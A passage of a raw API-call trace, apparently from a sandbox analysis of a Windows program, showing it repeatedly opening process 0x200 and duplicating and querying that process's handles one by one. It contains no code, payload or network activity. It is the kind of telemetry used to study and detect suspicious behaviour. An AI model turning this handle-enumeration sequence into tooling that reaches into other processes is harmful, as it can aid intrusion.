out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.123] GetTickCount () returned 0xe862f7 [0113.123] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.123] GetTickCount () returned 0xe862f7 [0113.123] GetTickCount () returned 0xe862f7 [0113.123] CloseHandle (hObject=0x1b8) returned 1 [0113.123] GetTickCount () returned 0xe862f7 [0113.123] CloseHandle (hObject=0x198) returned 1 [0113.123] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.123] GetTickCount () returned 0xe862f7 [0113.123] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x74, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.123] GetTickCount () returned 0xe862f7 [0113.123] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.123] GetTickCount () returned 0xe862f7 [0113.124] GetTickCount () returned 0xe862f7 [0113.124] CloseHandle (hObject=0x1b8) returned 1 [0113.124] GetTickCount () returned 0xe862f7 [0113.124] CloseHandle (hObject=0x198) returned 1 [0113.124] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.124] GetTickCount () returned 0xe862f7 [0113.124] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x78, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.124] GetTickCount () returned 0xe862f7 [0113.124] GetTickCount () returned 0xe862f7 [0113.124] CloseHandle (hObject=0x198) returned 1 [0113.124] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.124] GetTickCount () returned 0xe862f7 [0113.124] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.124] GetTickCount () returned 0xe862f7 [0113.125] GetTickCount () returned 0xe862f7 [0113.125] CloseHandle (hObject=0x198) returned 1 [0113.125] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.125] GetTickCount () returned 0xe862f7 [0113.125] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x80, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.125] GetTickCount () returned 0xe862f7 [0113.125] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.125] GetTickCount () returned 0xe862f7 [0113.125] GetTickCount () returned 0xe862f7 [0113.125] CloseHandle (hObject=0x1b8) returned 1 [0113.125] GetTickCount () returned 0xe862f7 [0113.125] CloseHandle (hObject=0x198) returned 1 [0113.125] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.125] GetTickCount () returned 0xe862f7 [0113.126] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x84, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.126] GetTickCount () returned 0xe862f7 [0113.126] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.126] GetTickCount () returned 0xe862f7 [0113.126] GetTickCount () returned 0xe862f7 [0113.126] CloseHandle (hObject=0x1b8) returned 1 [0113.126] GetTickCount () returned 0xe862f7 [0113.126] CloseHandle (hObject=0x198) returned 1 [0113.126] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.126] GetTickCount () returned 0xe862f7 [0113.126] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x88, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.126] GetTickCount () returned 0xe862f7 [0113.126] GetTickCount () returned 0xe862f7 [0113.126] CloseHandle (hObject=0x198) returned 1 [0113.126] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.126] GetTickCount () returned 0xe862f7 [0113.127] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x8c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.127] GetTickCount () returned 0xe862f7 [0113.127] GetTickCount () returned 0xe862f7 [0113.127] CloseHandle (hObject=0x198) returned 1 [0113.127] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.127] GetTickCount () returned 0xe862f7 [0113.127] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x90, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.127] GetTickCount () returned 0xe862f7 [0113.127] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.127] GetTickCount () returned 0xe862f7 [0113.127] GetTickCount () returned 0xe862f7 [0113.127] CloseHandle (hObject=0x1b8) returned 1 [0113.127] GetTickCount () returned 0xe862f7 [0113.127] CloseHandle (hObject=0x198) returned 1 [0113.127] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.128] GetTickCount () returned 0xe862f7 [0113.128] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x94, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.128] GetTickCount () returned 0xe862f7 [0113.128] GetTickCount () returned 0xe862f7 [0113.128] CloseHandle (hObject=0x198) returned 1 [0113.128] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.128] GetTickCount () returned 0xe862f7 [0113.128] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x98, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.128] GetTickCount () returned 0xe862f7 [0113.128] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.128] GetTickCount () returned 0xe862f7 [0113.128] GetTickCount () returned 0xe862f7 [0113.128] CloseHandle (hObject=0x1b8) returned 1 [0113.128] GetTickCount () returned 0xe862f7 [0113.129] CloseHandle (hObject=0x198) returned 1 [0113.129] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.129] GetTickCount () returned 0xe862f7 [0113.129] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x9c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.129] GetTickCount () returned 0xe862f7 [0113.129] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.129] GetTickCount () returned 0xe862f7 [0113.129] GetTickCount () returned 0xe862f7 [0113.129] CloseHandle (hObject=0x1b8) returned 1 [0113.129] GetTickCount () returned 0xe862f7 [0113.129] CloseHandle (hObject=0x198) returned 1 [0113.129] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.129] GetTickCount () returned 0xe862f7 [0113.129] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.129] GetTickCount () returned 0xe862f7 [0113.130] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.130] GetTickCount () returned 0xe862f7 [0113.130] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.130] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.130] GetTickCount () returned 0xe862f7 [0113.130] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.130] GetTickCount () returned 0xe862f7 [0113.130] CloseHandle (hObject=0x1b8) returned 1 [0113.130] GetTickCount () returned 0xe862f7 [0113.130] CloseHandle (hObject=0x198) returned 1 [0113.130] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.130] GetTickCount () returned 0xe862f7 [0113.130] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xa4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.130] GetTickCount () returned 0xe862f7 [0113.130] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.130] GetTickCount () returned 0xe862f7 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] CloseHandle (hObject=0x1b8) returned 1 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] CloseHandle (hObject=0x198) returned 1 [0113.131] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] CloseHandle (hObject=0x1b8) returned 1 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] CloseHandle (hObject=0x198) returned 1 [0113.131] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.131] GetTickCount () returned 0xe862f7 [0113.131] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.132] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] CloseHandle (hObject=0x1b8) returned 1 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] CloseHandle (hObject=0x198) returned 1 [0113.132] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xb0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] GetTickCount () returned 0xe862f7 [0113.132] CloseHandle (hObject=0x198) returned 1 [0113.133] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] CloseHandle (hObject=0x1b8) returned 1 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] CloseHandle (hObject=0x198) returned 1 [0113.133] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.133] GetTickCount () returned 0xe862f7 [0113.133] GetTickCount () returned 0xe862f7 [0113.134] CloseHandle (hObject=0x1b8) returned 1 [0113.134] GetTickCount () returned 0xe862f7 [0113.134] CloseHandle (hObject=0x198) returned 1 [0113.134] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.134] GetTickCount () returned 0xe862f7 [0113.134] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xbc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.134] GetTickCount () returned 0xe862f7 [0113.134] GetTickCount () returned 0xe862f7 [0113.134] CloseHandle (hObject=0x198) returned 1 [0113.134] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.134] GetTickCount () returned 0xe862f7 [0113.135] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.135] GetTickCount () returned 0xe86307 [0113.135] GetTickCount () returned 0xe86307 [0113.135] CloseHandle (hObject=0x198) returned 1 [0113.135] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.135] GetTickCount () returned 0xe86307 [0113.135] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.135] GetTickCount () returned 0xe86307 [0113.135] GetTickCount () returned 0xe86307 [0113.135] CloseHandle (hObject=0x198) returned 1 [0113.135] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.135] GetTickCount () returned 0xe86307 [0113.135] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.135] GetTickCount () returned 0xe86307 [0113.135] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.135] GetTickCount () returned 0xe86307 [0113.136] GetTickCount () returned 0xe86307 [0113.136] CloseHandle (hObject=0x1b8) returned 1 [0113.136] GetTickCount () returned 0xe86307 [0113.136] CloseHandle (hObject=0x198) returned 1 [0113.136] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.136] GetTickCount () returned 0xe86307 [0113.136] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.136] GetTickCount () returned 0xe86307 [0113.136] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.136] GetTickCount () returned 0xe86307 [0113.136] GetTickCount () returned 0xe86307 [0113.137] CloseHandle (hObject=0x1b8) returned 1 [0113.137] GetTickCount () returned 0xe86307 [0113.137] CloseHandle (hObject=0x198) returned 1 [0113.137] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.137] GetTickCount () returned 0xe86307 [0113.137] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.137] GetTickCount () returned 0xe86307 [0113.137] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.137] GetTickCount () returned 0xe86307 [0113.137] GetTickCount () returned 0xe86307 [0113.137] CloseHandle (hObject=0x1b8) returned 1 [0113.137] GetTickCount () returned 0xe86307 [0113.137] CloseHandle (hObject=0x198) returned 1 [0113.137] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.138] GetTickCount () returned 0xe86307 [0113.138] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.138] GetTickCount () returned 0xe86307 [0113.138] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.138] GetTickCount () returned 0xe86307 [0113.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.138] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.138] GetTickCount () returned 0xe86307 [0113.138] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.138] GetTickCount () returned 0xe86307 [0113.138] CloseHandle (hObject=0x1b8) returned 1 [0113.138] GetTickCount () returned 0xe86307 [0113.138] CloseHandle (hObject=0x198) returned 1 [0113.138] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.138] GetTickCount () returned 0xe86307 [0113.138] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xd8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.139] GetTickCount () returned 0xe86307 [0113.139] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.139] CloseHandle (hObject=0x1b8) returned 1 [0113.139] CloseHandle (hObject=0x198) returned 1 [0113.139] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.139] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xdc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.139] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.139] CloseHandle (hObject=0x1b8) returned 1 [0113.140] CloseHandle (hObject=0x198) returned 1 [0113.140] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.140] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xe0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.140] CloseHandle (hObject=0x198) returned 1 [0113.140] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.140] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xe4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.140] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.140] CloseHandle (hObject=0x1b8) returned 1 [0113.140] CloseHandle (hObject=0x198) returned 1 [0113.140] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.141] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.141] CloseHandle (hObject=0x198) returned 1 [0113.141] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.141] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.141] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.141] CloseHandle (hObject=0x1b8) returned 1 [0113.141] CloseHandle (hObject=0x198) returned 1 [0113.141] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.142] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.142] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.142] CloseHandle (hObject=0x1b8) returned 1 [0113.142] CloseHandle (hObject=0x198) returned 1 [0113.142] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.142] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.142] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.142] CloseHandle (hObject=0x1b8) returned 1 [0113.143] CloseHandle (hObject=0x198) returned 1 [0113.143] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.143] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.143] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0113.143] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.143] GetTickCount () returned 0xe86307 [0113.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.143] GetTickCount () returned 0xe86307 [0113.143] CloseHandle (hObject=0x1b8) returned 1 [0113.143] GetTickCount () returned 0xe86307 [0113.144] CloseHandle (hObject=0x198) returned 1 [0113.144] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.144] GetTickCount () returned 0xe86307 